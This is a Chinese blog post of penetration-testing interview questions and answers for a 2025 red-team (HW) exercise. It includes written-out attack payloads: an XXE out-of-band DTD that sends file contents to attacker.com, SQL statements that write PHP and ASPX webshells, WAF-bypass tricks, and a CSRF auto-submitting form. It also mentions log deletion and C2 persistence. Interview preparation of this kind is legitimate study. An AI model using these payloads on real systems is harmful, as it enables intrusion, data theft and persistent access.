2025年渗透测试面试题总结-2025年HW(护网面试) 46(题目+回答)

发布于:2025-07-17 ⋅ 阅读:(31) ⋅ 点赞:(0)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 46

2. OWASP Top 10 漏洞熟悉点

3. SQL注入原理、盲注函数及WAF绕过

原理

盲注常用函数

绕WAF手段

4. XXE漏洞全解析

原理

实现过程

无回显解决方案(OOB外带)

GetShell可能性

5. 完整渗透思路(PTES标准流程)

6. Nmap常用参数

7. Burp Suite常用模块

8. 内网渗透第一步:信息收集与权限稳固

9. SQL写Webshell方法

10. 提权方式及命令执行函数

提权方式

命令执行函数

11. 反序列化漏洞核心

反序列化函数

Java反序列化Gadget类

12. CSRF漏洞与渗透技巧

原理

防御方案

渗透思路

漏洞挖掘方法

 2025年HW(护网面试) 46

1、自我介绍
2、owasp top10 漏洞你最熟悉那些
3、请下sql注入原理 ,盲注常用那些函数,绕waf的手段有那些
4、XXE原理,XXE实现过程,XXE页面没有回显怎么解决,XXE可以getshell不
5、完整的渗透思路
6、你知道Nmap那些参数 (三次握手是用哪个参数)
7、BURP 常用的模块
8、知道内网渗透吗?拿到webshell入侵内网第一步该干什么
9、sql如何写shell
10、知道那些提权的方式,怎么提权的
10、命令执行常用函数
11、反序列化函数,java反序列化 用那些类
12、CSRF 原理 怎么防御 ,渗透思路 平时怎么挖漏洞的

2. OWASP Top 10 漏洞熟悉点

  • 注入漏洞(SQL/NoSQL/OS):数据库语句拼接导致的命令执行
  • 失效的访问控制:越权访问(水平/垂直)、JWT 篡改
  • XSS(跨站脚本):存储型危害最大,可窃取会话/钓鱼
  • SSRF(服务端请求伪造):内网探测、云元数据利用
  • XXE(XML外部实体):文件读取/内网探测(详见问题4)
  • 反序列化漏洞:Java/PHP/.NET 对象构造触发RCE(详见问题11)
  • 安全配置错误:默认凭证、目录列表、未更新补丁

3. SQL注入原理、盲注函数及WAF绕过

原理

攻击者通过篡改SQL查询结构,使应用执行恶意SQL语句(如 ' OR 1=1-- 绕过登录)。

盲注常用函数
数据库类型 函数示例
MySQL SUBSTR(), SLEEP(), IF(), BENCHMARK()
MSSQL WAITFOR DELAY '0:0:5', CHAR(), PATINDEX()
Oracle UTL_HTTP.REQUEST, DBMS_PIPE.RECEIVE_MESSAGE
绕WAF手段
  • 混淆编码:Hex/Base64/Unicode(如 SELECT\x53\x45\x4C\x45\x43\x54
  • 注释分割SEL/**/ECT/*!50000SELECT*/(MySQL版本特化)
  • 参数污染id=1&id=2' UNION SELECT(利用后端解析差异)
  • 函数替代LIKE 替代 =COALESCE() 替代空格
  • HTTP参数污染:多参数干扰WAF检测逻辑

4. XXE漏洞全解析

原理

XML解析器未禁用外部实体引用,导致恶意实体被解析。

实现过程
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> <!-- 回显文件内容 -->
无回显解决方案(OOB外带)
  1. 构造带外通道
    xml<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;
  2. evil.dtd 内容
    dtd<!ENTITY % file SYSTEM "file:///secret.txt"> <!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>"> %exfil;
GetShell可能性
  • 条件苛刻:需目标环境支持expect://jar://等危险协议(PHP环境为主)
  • 实战案例:通过file:///proc/self/cwd/读取路径,结合上传漏洞实现RCE

5. 完整渗透思路(PTES标准流程)

  1. 信息收集
    • 子域名爆破(Amass)、端口扫描(Nmap -sS)
    • 指纹识别(Wappalyzer)、GitHub敏感信息泄露
  2. 漏洞扫描
    • 主动扫描(Nessus/AWVS) + 手动验证(Burp Suite)
  3. 漏洞利用
    • Web漏洞注入(SQLi/XSS/SSRF)
    • 中间件漏洞(Tomcat RCE, Weblogic反序列化)
  4. 权限提升
    • Linux:SUID/GTFOBins、内核提权(DirtyPipe)
    • Windows:Token窃取、服务路径漏洞
  5. 内网横向移动
    • 凭证抓取(Mimikatz)、SMB爆破(CrackMapExec)
    • PTH(Pass-the-Hash)攻击
  6. 痕迹清除与报告
    • 删除日志、上传清理脚本

6. Nmap常用参数

参数 用途 示例
-sS SYN扫描(半开放扫描) nmap -sS 192.168.1.1
-sV 服务版本探测 nmap -sV -p 80,443
-O 操作系统识别 nmap -O 192.168.1.0/24
-A 全面扫描(含OS/版本/脚本) nmap -A target.com
-Pn 跳过主机发现(穿透防火墙) nmap -Pn 10.10.11.12

三次握手相关-sS(SYN扫描)仅发送SYN包,不完成TCP连接,规避日志记录。


7. Burp Suite常用模块

模块 核心功能
Proxy 拦截/修改HTTP流量(Repeater重放请求)
Intruder 自动化攻击(爆破密码、枚举参数)
Scanner 自动漏洞扫描(需Pro版)
Decoder 编解码工具(Base64/URL/Hex)
Collaborator 检测盲注/SSRF(DNS/HTTP外带)

8. 内网渗透第一步:信息收集与权限稳固

  1. 主机信息
    • ipconfig /all(Windows) / ifconfig(Linux)
    • systeminfo / uname -a
  2. 网络拓扑
    • 路由追踪:tracert 8.8.8.8
    • ARP表:arp -a
  3. 权限维持
    • 添加后门账户 / Webshell持久化
    • 部署C2通道(Cobalt Strike/Meterpreter)
  4. 凭证获取
    • 内存抓密码(Mimikatz)
    • 配置文件搜索(数据库连接字符串)

9. SQL写Webshell方法

条件:数据库有文件写权限 + 知晓绝对路径

  • MySQL
    sqlSELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; 
  • MSSQL
    sqlEXEC sp_makewebtask 'C:\inetpub\wwwroot\shell.aspx', '<?% @Page Language="Jscript"%><%eval(Request.Item["cmd"])%>';

10. 提权方式及命令执行函数

提权方式
类型 方法
系统漏洞 Windows:PrintNightmare、EternalBlue
Linux:DirtyCow、Polkit-pkexec (CVE-2021-4034)
配置错误 SUID程序滥用(find/cp)、sudoers错误配置
服务漏洞 MySQL UDF提权、Redis写SSH公钥
命令执行函数
语言 危险函数示例
PHP system(), exec(), passthru(), shell_exec()
Java Runtime.getRuntime().exec()
Python os.system(), subprocess.Popen()

11. 反序列化漏洞核心

反序列化函数
  • PHP:unserialize()
  • Java:ObjectInputStream.readObject()
  • Python:pickle.loads()
Java反序列化Gadget类
库/组件 利用链类示例
Commons-Collections InvokerTransformer, ConstantTransformer
JDK AnnotationInvocationHandler
Groovy MethodClosure
Fastjson JdbcRowSetImpl(JNDI注入)

12. CSRF漏洞与渗透技巧

原理

诱使用户在已登录状态下执行非预期操作(如转账 POST /transfer?to=hacker&amount=10000)。

防御方案
  • Token验证:表单添加随机Token(同源策略保护)
  • SameSite Cookie:设置 StrictLax 模式
  • 验证Referer:检查请求来源域名
渗透思路
  • 检测:Burp生成CSRF PoC,观察是否缺少Token/Referer检查
  • 利用
    html<form action="http://bank.com/transfer" method="POST"> <input type="hidden" name="to" value="hacker"> <input type="hidden" name="amount" value="10000"> </form> <script>document.forms[0].submit();</script> 
漏洞挖掘方法
  1. 自动化扫描:Burp Suite + CSRF Scanner插件
  2. 手动测试
    • 删除Token参数观察是否仍可请求
    • 替换Referer为其他域名测试
  3. 业务逻辑深挖:关注敏感操作(密码修改、邮箱绑定)

网站公告

今日签到

点亮在社区的每一天
去签到